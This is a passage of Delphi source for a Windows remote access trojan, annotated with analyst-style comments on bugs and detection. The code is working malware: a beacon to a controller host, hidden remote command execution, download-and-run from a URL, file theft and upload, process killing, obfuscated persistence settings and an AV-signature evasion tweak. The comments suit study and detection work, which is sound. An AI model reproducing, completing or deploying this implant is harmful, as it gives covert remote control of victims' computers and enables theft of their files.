JBE @D5
ADD ECX,EDX
MOV AL,'0'
SUB ESI,EDX
JMP @z
@zloop: MOV [ESI+EDX],AL
@z: DEC EDX
JNZ @zloop
MOV [ESI],AL
@D5:
end;
// Hex formatter written in inline assembly (same shape as the RTL routine of
// this name). Delphi "register" convention: EAX = Value, EDX = Digits,
// ECX = pointer to the string Result.
// Builds a 32-byte scratch buffer on the stack, lets CvtInt render Value in
// radix 16 into it, then turns the rendered characters into a string.
// Padding to Digits characters is presumably CvtInt's job -- its contract is
// outside this file, confirm there.
function IntToHex(Value: Integer; Digits: Integer): string;
asm
  CMP EDX, 32                     // unsigned compare, so a negative Digits
  JBE @A1                         // also lands in the > 32 case ...
  XOR EDX, EDX                    // ... and is replaced by 0
@A1: PUSH ESI                     // ESI is callee-saved; restore it at the end
  MOV ESI, ESP                    // ESI = top of the buffer about to be reserved
  SUB ESP, 32                     // 32-byte scratch buffer (enough for 32 hex digits)
  PUSH ECX                        // keep the Result pointer across CvtInt
  MOV ECX, 16                     // radix 16
  CALL CvtInt                     // EAX = Value, EDX = Digits, ECX = radix;
                                  // presumably returns buffer start in ESI and
                                  // length in ECX -- verify against CvtInt
  MOV EDX, ESI                    // EDX = source characters
  POP EAX                         // EAX = Result pointer again
  CALL System.@LStrFromPCharLen   // Result := string(PChar(EDX), ECX)
  ADD ESP, 32                     // drop the scratch buffer
  POP ESI
end;
// List processes + list modules (shows PID, thread count, modules)
// Enumerates every running process through a Toolhelp snapshot and streams one
// line per process to the controller socket (Serv.Sock); when dInt = 1 it also
// streams one line per module loaded in that process. Every line is followed
// by a blocking Recv that waits for an acknowledgement from the remote side.
//   dInt   1 = processes and modules, anything else = processes only
// Wire format (space separated, #10 terminated):
//   C_PROCESSLIST <threads> <pid> <pid as 8 hex digits> <exe path>
//   C_MODULELIST  <pid> <exe name>#1<space><module path>
// Detection note: this is the CreateToolhelp32Snapshot -> OpenProcess
// (PROCESS_QUERY_INFORMATION or PROCESS_VM_READ) -> EnumProcessModules
// sequence applied to every PID on the box.
procedure ListProcess(dInt: Integer);
var
  CB: DWord;                        // bytes returned by EnumProcessModules
  hMod_: HMODULE;                   // first module handle only (the main image)
  hMod: array[0..300] of HMODULE;   // up to 301 module handles
  hProcess: THandle;
  hModule: THandle;                 // unused
  hSnapShot: THandle;
  ProcessName: array[0..300] of Char;
  ModuleName: array[0..300] of Char;
  ProcessEntry: TProcessEntry32;
  Done: Boolean;                    // True while Process32First/Next succeed
  Temp: string;                     // line being sent
  Mods: Integer;                    // module count derived from CB
  I: Word;
  B: array[0..9] of Char;           // acknowledgement bytes; contents are ignored
begin
  // The snapshot handle is not checked against INVALID_HANDLE_VALUE.
  hSnapShot := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
  ProcessEntry.dwSize := SizeOf(ProcessEntry);
  Done := Process32First(hSnapShot, ProcessEntry);
  while Done do
  begin
    hProcess := OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_READ, False,
      ProcessEntry.th32ProcessID);
    if (hProcess <> 0) then
    begin
      // Return values are ignored: if EnumProcessModules fails, hMod_ and CB
      // keep whatever happened to be on the stack.
      EnumProcessModules(hProcess, @hMod_, SizeOf(hMod_), CB);
      GetModuleFileNameExA(hProcess, hMod_, ProcessName, SizeOf(ProcessName));
      // Only processes whose image path could be resolved are reported.
      if (Pos('\', ProcessName) > 0) then
      begin
        Temp := IntToStr(C_PROCESSLIST) + ' ' +
          IntToStr(ProcessEntry.cntThreads) + ' ' +
          IntToStr(ProcessEntry.th32ProcessID) + ' ' +
          IntToHex(ProcessEntry.th32ProcessID, 8) + ' ' +
          ProcessName + #10;
        Send(Serv.Sock, Temp[1], Length(Temp), 0);
        // Wait for the controller's acknowledgement; a closed or failing
        // socket aborts the whole listing.
        if (Recv(Serv.Sock, B[0], SizeOf(B), 0) <= 0) then
        begin
          CloseHandle(hProcess);
          CloseHandle(hSnapShot);
          Exit;
        end;
        if (dInt = 1) then
        begin
          EnumProcessModules(hProcess, @hMod, SizeOf(hMod), CB);
          // CB is the byte count needed, which can exceed SizeOf(hMod) for a
          // process with more than 301 modules; the loop below is also
          // inclusive (0..Mods), so it visits Mods + 1 slots, the last of
          // which EnumProcessModules did not fill.
          Mods := CB div SizeOf(HMODULE);
          Temp := '';
          for I := 0 to Mods do
          begin
            GetModuleFilenameExA(hProcess, hMod[I], ModuleName,
              SizeOf(ModuleName));
            Temp := IntToStr(C_MODULELIST) + ' ' +
              IntToStr(ProcessEntry.th32ProcessID) + ' ' +
              ExtractFileName(ProcessName) + #1' ' +
              ModuleName + #10;
            Send(Serv.Sock, Temp[1], Length(Temp), 0);
            // Same acknowledgement handshake per module line.
            if (Recv(Serv.Sock, B[0], SizeOf(B), 0) <= 0) then
            begin
              CloseHandle(hProcess);
              CloseHandle(hSnapShot);
              Exit;
            end;
          end;
        end;
      end;
      CloseHandle(hProcess);
    end;
    Done := Process32Next(hSnapshot, ProcessEntry);
  end;
  CloseHandle(hSnapShot);
end;
// Terminates the process whose decimal PID is dPID and reports the outcome to
// the controller as "C_ENDPROCESS <pid> 0"#10 (failure) or "... 1"#10 (success).
// Notes on the code as written:
//  * The OpenProcess result is not checked; a 0 handle simply makes
//    TerminateProcess fail, which is reported as 0.
//  * ProcessHandle is never closed (handle leak on every call).
//  * StrToInt raises EConvertError on a non-numeric dPID; no handler is
//    visible in this file.
procedure EndProcess(dPID: string);
var
  ProcessHandle: THandle;
  ReturnValue: Boolean;
  Temp: string;
begin
  ProcessHandle := OpenProcess(PROCESS_TERMINATE, BOOL(0), StrToInt(dPID));
  ReturnValue := TerminateProcess(ProcessHandle, 0);
  if (not ReturnValue) then
    Temp := IntToStr(C_ENDPROCESS) + ' ' + dPID + ' 0'#10   // failed
  else
    Temp := IntToStr(C_ENDPROCESS) + ' ' + dPID + ' 1'#10;  // terminated
  Send(Serv.Sock, Temp[1], Length(Temp), 0);
end;
// Runs DosApp as a hidden child process with its standard output redirected
// into an anonymous pipe, waits for the child to exit, and returns everything
// it wrote, converted from the OEM code page to ANSI. Used by C_REMOTECMD.
// Observations on the code as written:
//  * The child's stdin is the *read* end of the same pipe (start.hStdInput),
//    so a child that reads stdin would be reading its own output.
//  * hStdError is never set, so stderr is not captured.
//  * Output is read only after the child has exited (poll every 100 ms).
//  * Result is never explicitly set to '' before being appended to; it relies
//    on the caller's result temporary being empty.
//  * If CreateProcess fails, ProcessInfo is closed without having been
//    filled in, and Result is left untouched.
//  * Return values of ReadFile are ignored; a failed read leaves BytesRead = 0,
//    which ends the read loop.
function RunDosInCap(DosApp: string): string;
const
  ReadBuffer = 24000;                     // bytes requested per ReadFile
var
  Security: TSecurityAttributes;
  ReadPipe, WritePipe: THandle;
  start: TStartUpInfo;
  ProcessInfo: TProcessInformation;
  Buffer: Pchar;                          // ReadBuffer + 1 bytes, NUL terminated by hand
  BytesRead, Apprunning: DWord;
begin
  with Security do
  begin
    nlength := SizeOf(TSecurityAttributes);
    binherithandle := true;               // pipe handles must be inheritable by the child
    lpsecuritydescriptor := nil;
  end;
  if Createpipe(ReadPipe, WritePipe, @Security, 0) then
  begin
    Buffer := AllocMem(ReadBuffer + 1);
    FillChar(Start, Sizeof(Start), #0);
    start.cb := SizeOf(start);
    start.hStdOutput := WritePipe;
    start.hStdInput := ReadPipe;          // read end of the same pipe (see note above)
    start.dwFlags := STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW;
    start.wShowWindow := SW_HIDE;         // no visible console window
    if CreateProcess(nil, PChar(DosApp), @Security, @Security, true,
      NORMAL_PRIORITY_CLASS, nil, nil, start, ProcessInfo) then
    begin
      // Poll until the child is no longer running.
      repeat
        Apprunning := WaitForSingleObject(ProcessInfo.hProcess, 100);
      until (Apprunning <> WAIT_TIMEOUT);
      // Drain the pipe in ReadBuffer-sized chunks; a short chunk ends the loop.
      repeat
        BytesRead := 0;
        ReadFile(ReadPipe, Buffer[0], ReadBuffer, BytesRead, nil);
        Buffer[BytesRead] := #0;
        OemToAnsi(Buffer, Buffer);        // in-place code page conversion
        Result := Result + string(Buffer);
      until (BytesRead < ReadBuffer);
    end;
    FreeMem(Buffer);
    CloseHandle(ProcessInfo.hProcess);
    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ReadPipe);
    CloseHandle(WritePipe);
  end;
end;
// Replaces every occurrence of ReplaceWord in Text with WithWord, in place,
// scanning from the start after each substitution.
// Matches are case-sensitive (Pos). An empty ReplaceWord never matches, so
// Text is left alone. If WithWord itself contains ReplaceWord the loop never
// terminates (each substitution creates a new match).
procedure ReplaceStr(ReplaceWord, WithWord: string; var Text: string);
var
  Hit: Integer;
begin
  Hit := Pos(ReplaceWord, Text);
  while Hit > 0 do
  begin
    Delete(Text, Hit, Length(ReplaceWord));
    Insert(WithWord, Text, Hit);
    Hit := Pos(ReplaceWord, Text);
  end;
end;
// File transfer and command dispatch
// Command loop for one controller session. Waits up to 120 s for data on
// Sock, reads up to 1600 bytes, splits the text on #10 and dispatches each
// line by its leading numeric command. Leaves the loop (and closes Sock)
// only when select times out or Recv fails; `until 1 = 2` never ends it.
// Framing notes on the code as written:
//  * Data := string(Buffer) stops at the first #0. Buffer is zeroed only
//    *after* that conversion, so on the first pass a full 1600-byte read has
//    no guaranteed terminator inside the array.
//  * Data is replaced on every Recv, so a partial line with no #10 yet is
//    discarded rather than carried over to the next read.
//  * StrToInt(Cmd) raises on a non-numeric command token; no handler is
//    visible in this file.
//  * Info is a shared (non-local) record handed to every transfer thread;
//    a second transfer started while one is running overwrites it.
procedure TServer.ReceiveData;
var
  Buffer: array[0..1600] of Char;
  Data: string;                   // unconsumed text of the last Recv
  Time: TTimeVal;
  FDS: TFDSet;
  D: Dword;                       // thread id out-parameter, unused
  Len: Integer;
  Port: Integer;                  // ephemeral port announced for a transfer
  Temp: string;                   // current line, then reused as scratch
  Cmd: string;                    // leading command token
  Param: array[0..100] of string; // remaining tokens
  P: Integer;
  FName: string;
begin
  repeat
    Time.tv_sec := 120;           // idle timeout before the session is dropped
    Time.tv_usec := 0;
    FD_ZERO(FDS);
    FD_SET(Sock, FDS);
    if Select(0, @FDS, nil, nil, @TIME) <= 0 then Break;
    Len := Recv(Sock, Buffer, 1600, 0);
    if (Len <= 0) then Break;
    Data := string(Buffer);
    ZeroMemory(@Buffer, SizeOf(Buffer));
    // One protocol line per #10.
    while (Pos(#10, Data) > 0) do
    begin
      Temp := Copy(Data, 1, Pos(#10, Data) - 1);
      Delete(Data, 1, Pos(#10, Data));
      StripOutCmd(Temp, Cmd);     // helper outside this file: Cmd := command token
      StripOutParam(Temp, Param); // helper outside this file: Param[] := tokens
      case StrToInt(Cmd) of
        // Fetch and run something from URL Param[0] (ExecuteFileFromURL is
        // outside this file), report, then end this process 2 s later.
        C_DOWNLOAD:
          begin
            Temp := IntToStr(C_DOWNLOAD) + ' ' + ExecuteFileFromURL(Param[0],
              Copy(Temp, Pos(Param[1], Temp), Length(Temp)));
            Send(Sock, Temp[1], Length(Temp), 0);
            Sleep(2000);
            ExitProcess(0);
          end;
        C_UNINSTALL: Uninstall;
        // Password rejected: the socket is closed but the loop continues;
        // presumably the next Select on the closed socket fails and breaks
        // out -- confirm.
        C_PASS:
          if (Param[0] = '0') then CloseSocket(Sock);
        // Upload a local file to the controller: the path is the line minus
        // its first two characters; spaces in the base name become '_', a
        // port in 1000..9499 is chosen, a C_STARTTRANSFER line announces
        // size/port/name, and SendFile runs on a new thread.
        C_GETFILE:
          begin
            Delete(Temp, 1, 2);
            if (FileExists(Temp)) then
            begin
              FName := ExtractFileName(Temp);
              // Runs at least once: with no space present P = 0 and the
              // Delete/Insert pair is applied at index 0 (RTL clamping
              // decides the effect -- confirm).
              repeat
                P := Pos(#32, FName);
                Delete(FName, P, 1);
                Insert('_', FName, P);
              until (Pos(#32, FName) = 0);
              Port := ((Random(9) + 1) * 1000) + Random(500);
              SendData(IntToStr(C_STARTTRANSFER) + ' 0 ' +
                IntToStr(GetFileSize(Temp)) + ' ' + IntToStr(Port) + ' ' + FName +
                #10);
              Info.Name := Temp;
              Info.Host := RemoteAddress(Sock);
              Info.Port := Port;
              CreateThread(nil, 0, @SendFile, @Info, 0, D);
            end;
          end;
        // Receive a file from the controller; see the format comment below.
        // FName is the text after #1 (skipping one more character), Temp the
        // text before it, Param[0] the expected size.
        C_PUTFILE:
          begin
            (* C_PUTFILE size NewName#1 OldName *)
            Temp := Copy(Temp, Pos(Param[1], Temp), Length(Temp));
            FName := Copy(Temp, Pos(#1, Temp) + 2, Length(Temp));
            Temp := Copy(Temp, 1, Pos(#1, Temp) - 1);
            Port := ((Random(9) + 1) * 1000) + Random(500);
            SendData(IntToStr(C_STARTTRANSFER) + ' 1 ' + Param[0] + ' ' +
              IntToStr(Port) + ' ' + FName + #10);
            Info.Name := Temp;
            Info.Host := RemoteAddress(Sock);
            Info.Port := Port;
            Info.Size := StrToInt(Param[0]);
            CreateThread(nil, 0, @RecvFile, @Info, 0, D);
          end;
        C_INFOSYSTEM: SendData(GetInformation());
        C_INFOSERVER: SendData(GetServerInfo());
        C_INFONETWORK: SendData(GetNetworkInfo());
        // One line per logical drive. The 300-Char buffer is split on every
        // #0, so the loop keeps going past the list's double-#0 terminator
        // and also emits whatever SetLength left in the remaining bytes.
        C_REQUESTDRIVE:
          begin
            SetLength(Temp, 300);
            GetLogicalDriveStrings(300, pChar(Temp));
            while (Pos(#0, Temp) > 0) do
            begin
              FName := IntToStr(C_REQUESTDRIVE) + ' ' + Copy(Temp, 1, Pos(#0,
                Temp) - 1) + #10;
              Temp := Copy(Temp, Pos(#0, Temp) + 1, Length(Temp));
              Send(Sock, FName[1], Length(FName), 0);
              FName := '';
            end;
          end;
        // Directory listing (GenerateList is outside this file, called for
        // modes 1 and 2). The path is cached in LastDir as a ready-made
        // C_CURRENTPATH line ending in '\'#10. The `LastDir <> ''` test is
        // always true here because LastDir was just assigned a prefix.
        C_REQUESTLIST:
          begin
            Temp := Copy(Temp, Pos(Param[0], Temp), Length(Temp));
            GenerateList(Temp, 1);
            GenerateList(Temp, 2);
            LastDir := IntToStr(C_CURRENTPATH) + ' ' + Temp;
            if LastDir <> '' then
              if (LastDir[Length(LastDir)] <> '\') then
                LastDir := LastDir + '\';
            LastDir := LastDir + #10;
          end;
        // LastDir is '' at session start (set by Connect), so LastDir[1]
        // indexes an empty string if this arrives before any C_REQUESTLIST.
        C_CURRENTPATH: Send(Sock, LastDir[1], Length(LastDir), 0);
        // ShellExecute "open" on the text from Param[1] onward; Param[0] is
        // the show-window mode.
        C_EXECUTE:
          begin
            Temp := Copy(Temp, Pos(Param[1], Temp), Length(Temp));
            ShellExecute(0, 'open', pChar(Temp), nil, nil, StrToInt(Param[0]));
          end;
        C_DELETE:
          begin
            Temp := Copy(Temp, Pos(Param[0], Temp), Length(Temp));
            DeleteFile(pChar(Temp));
          end;
        // Process listing, then a C_FINISH line regardless of how
        // ListProcess ended.
        C_PROCESSLIST:
          begin
            ListProcess(StrToInt(Param[0]));
            Temp := IntToStr(C_FINISH) + ' '#10;
            Send(Sock, Temp[1], Length(Temp), 0);
          end;
        // Argument is the line from character 4 on (presumably a two-digit
        // command plus one space).
        C_ENDPROCESS: EndProcess(Copy(Temp, 4, Length(Temp)));
        // Runs the rest of the line through RunDosInCap and folds the
        // output's #10 into #1 so the whole result fits one protocol line.
        C_REMOTECMD:
          begin
            Temp := IntToStr(C_REMOTECMD) + ' ' +
              RunDosInCap(Copy(Temp, 4, Length(Temp)));
            ReplaceStr(#10, #1, Temp);
            Temp := Temp + #10;
            Send(Sock, Temp[1], Length(Temp), 0);
          end;
      end;
    end;
  until 1 = 2;
  CloseSocket(Sock);
end;
// Sends Text on Sock. The Send result is stored in dErr but never acted on:
// the `if dErr = 0 then Exit` has no effect because the procedure ends on the
// next line anyway, so SOCKET_ERROR and short sends are silently ignored.
// Text[1] on an empty Text would index an empty string; no caller in view
// passes ''.
procedure TServer.SendData(Text: string);
var
  dErr: Integer;
begin
  dErr := Send(Sock, Text[1], Length(Text), 0);
  if (dErr = 0) then Exit;   // no-op, see above
end;
// Returns the local NetBIOS computer name via GetComputerName, or the literal
// 'Unkown' (sic, kept for protocol compatibility) when the call fails.
// A 255-byte buffer is used; the real maximum is far smaller.
function ComputerName: string;
var
  NameBuf: PChar;
  NameLen: DWord;
  Ok: Boolean;
begin
  GetMem(NameBuf, 255);
  NameLen := 255;
  Ok := GetComputerName(NameBuf, NameLen);
  if not Ok then
    Result := 'Unkown'
  else
    Result := StrPas(NameBuf);
  FreeMem(NameBuf, 255);
end;
// Beacon loop: connects out to the configured host on TCP port 81 (the
// configured remote port is overridden by the hard-coded constant; the
// original expression is left in the trailing comment), sends a four-line
// handshake, hands the connection to ReceiveData, and sleeps 30 s after
// every failed attempt or finished session. Close is never set to True
// anywhere in this file, so the loop runs for the life of the process.
// Handshake lines (each #10 terminated):
//   "01 " + password, "02 " + version, "03 " + getnet, "20 " + computer name
// Detection note: fixed 30 s retry cadence to one host on port 81.
procedure TServer.Connect;
begin
  Password := PieZhi.dPass;
  Host := ResolveIP(PieZhi.dDnsHost);     // resolved once, not per attempt
  Port := 81; // StrToInt(PieZhi.dRemotePort);
  WSAStartUP($0101, WSA); // load the winsock library (version 1.1)
  Close := False;
  repeat
    // A fresh socket per attempt. On a failed connect it is never closed
    // here; on success ReceiveData closes it when the session ends.
    Sock := Socket(AF_INET, SOCK_STREAM, 0);
    Addr.sin_family := AF_INET;
    Addr.sin_port := hTons(Port);
    Addr.sin_addr.S_addr := inet_Addr(pChar(Host));
    if (Winsock.Connect(Sock, Addr, SizeOf(Addr)) = 0) then
    begin
      SendData('01 ' + password + #10);
      SendData('02 ' + version + #10);
      SendData('03 ' + getnet + #10);
      SendData('20 ' + ComputerName + #10);
      ReceiveData;                        // blocks for the whole session
    end;
    Sleep(30000);                         // 30 s between attempts
    LastDir := '';
  until (Close);
  WSACleanUP();
end;
// Reads the whole of file dName into Content, 1024 Chars at a time.
// Any exception (missing or locked file, ...) is swallowed: Content keeps
// whatever was read so far and, because CloseFile is not in a finally, the
// file stays open.
// FBuffer is not cleared between reads, so a short final block carries stale
// bytes from the previous block; the trim to FSize at the end removes them.
// The Char-array-to-string conversion presumably stops at the first #0
// (standard Delphi rule), so a #0 inside a block drops the rest of that
// block -- confirm, this matters because ReadSettings looks for the last #0.
procedure ReadFileStr(dName: string; var Content: string);
var
  FContents: file of Char;
  FBuffer: array[1..1024] of Char;
  rLen: LongInt;                // records actually read; not used below
  FSize: LongInt;               // file length in Chars
begin
  try
    Content := '';
    AssignFile(FContents, dName); // open the (possibly in-use) text file
    Reset(FContents);
    FSize := FileSize(FContents);
    while not EOF(FContents) do
    begin
      BlockRead(FContents, FBuffer, 1024, rLen); // read one 1024-Char block
      Content := Content + string(FBuffer);
    end;
    CloseFile(FContents);
    // Drop the stale tail of the last block.
    if Length(Content) > FSize then
      Content := Copy(Content, 1, FSize);
  except
    Exit;
  end;
end;
// Simple obfuscation --------------
// XOR-with-12 obfuscation applied to the embedded configuration. The
// transform is its own inverse, so the same routine both "encrypts" and
// "decrypts"; an empty input yields an empty result.
function EncryptText(Text: string): string;
var
  Idx: Word;
begin
  SetLength(Result, Length(Text));
  for Idx := 1 to Length(Text) do
    Result[Idx] := Chr(Ord(Text[Idx]) xor 12);
end;
// Read all configuration settings --------------
// Loads the implant's configuration into the global record pz^. The config
// blob is the run of bytes after the last #0 of ConFile (scanned backwards
// from the end of the file contents), obfuscated with EncryptText (XOR 12).
// Once decoded it is a sequence of fields, each a two-digit decimal length
// prefix followed by that many characters, consumed in the fixed order below.
// Notes on the code as written:
//  * NewFileName is never assigned in this version (the lines that set and
//    copy it are commented out), so DeleteFile is called with an empty name.
//  * When no config is found, Uninstall is called but there is no Exit, so
//    parsing continues on an empty string and StrToInt('') raises
//    EConvertError (unless Uninstall ends the process -- outside this file).
//  * Every field parse trusts its length prefix; a malformed prefix raises.
//  * I is a Word, so Length(FileContent) is truncated to 16 bits.
procedure ReadSettings;
var
  I: Word;
  Settings: string;        // decoded config blob, consumed field by field
  FileContent: string;     // raw contents of ConFile
  NewFileName: string;     // never assigned (see above)
begin
  // NewFileName := ParamStr(0) + '_'; // build the file name
  // CopyFile(pChar(ParamStr(0)), pChar(NewFileName), False); // copy
  ReadFileStr(ConFile, FileContent);
  I := Length(FileContent);
  Settings := '';
  // Collect the trailing bytes up to (not including) the last #0.
  while (I > 0) and (FileContent[i] <> #00) do
  begin
    Settings := FileContent[i] + Settings;
    Dec(I);
  end;
  if (Settings = '') then
  begin
    DeleteFile(pChar(NewFileName));
    Uninstall;
  end;
  Settings := EncryptText(Settings);
  // Each pair of lines: take the field (2-digit length at 1..2, text from 3),
  // then drop the prefix and the field from the front of Settings.
  pz^.Urlhttp := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //x
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dConType := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); // connection type: 0 = active (connect out), 1 = passive (listen)
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dDnsHost := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); //100
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dLocalPort := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); // passive-connection (listen) port
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dRemotePort := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); // active-connection port (note: Connect ignores it and uses 81)
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dPass := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); // connection password
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dGroup := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); // check-in group
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dRunAsSrv := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); // run as service: 1 = run as service, 2 = register for autostart
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dInsPath := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); // install path: 0 = <windows>, 1 = <system>, 2 = <temp>
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dInsFileName := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); // install file name
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dIsAutoDelMe := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); // self-delete: 0 = keep, 1 = delete self
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dSrvView := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); // service display name
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dSrvName := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); // service name
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dSrvText := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); // service description
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dMainThread := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); // Start.exe thread ID
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  strcopy(pz^.dhostProcess,PChar(Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))))); // host process name
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  strcopy(pz^.dDllFile,PChar(Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))))); // DLL file name (source repeats the "host process name" comment here)
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dRegLM := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); // register under HKEY_LOCAL_MACHINE
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dRegCU := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); // register under HKEY_CURRENT_USER
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  pz^.dRegSH := Copy(Settings, 3, StrToInt(Copy(Settings, 1, 2))); // register as Shell Explorer
  Delete(Settings, 1, StrToInt(Copy(Settings, 1, 2)) + 2);
  // DeleteFile(pChar(NewFileName));
end;
// Get a system directory --------------------
// Returns the Windows directory (dInt = 0) or the system directory
// (dInt = 1), always with a trailing backslash appended.
// For any other dInt neither API is called and the uninitialised local
// buffer is converted, so the result is undefined -- callers must pass 0 or 1.
function GetDirectory(dInt: Integer): string;
var
  PathBuf: array[0..255] of Char;
begin
  if dInt = 0 then
    GetWindowsDirectory(@PathBuf, 256)
  else if dInt = 1 then
    GetSystemDirectory(@PathBuf, 256);
  Result := string(PathBuf) + '\';
end;
// Entry point of the implant: waits until the machine reports Internet
// connectivity (polling every 5 s), then runs the beacon loop. Connect only
// returns when Close becomes True, which nothing in this file does, so in
// practice this procedure never finishes.
procedure miniratMain;
begin
  asm // two NOPs; the original comment says they were added to change the
      // byte pattern an AV signature matched on
    nop
    nop
  end;
  Serv := TServer.Create;
  while not (InternetGetConnectedState(nil, 0)) do
    Sleep(5000);
  Serv.Connect;
end;
end.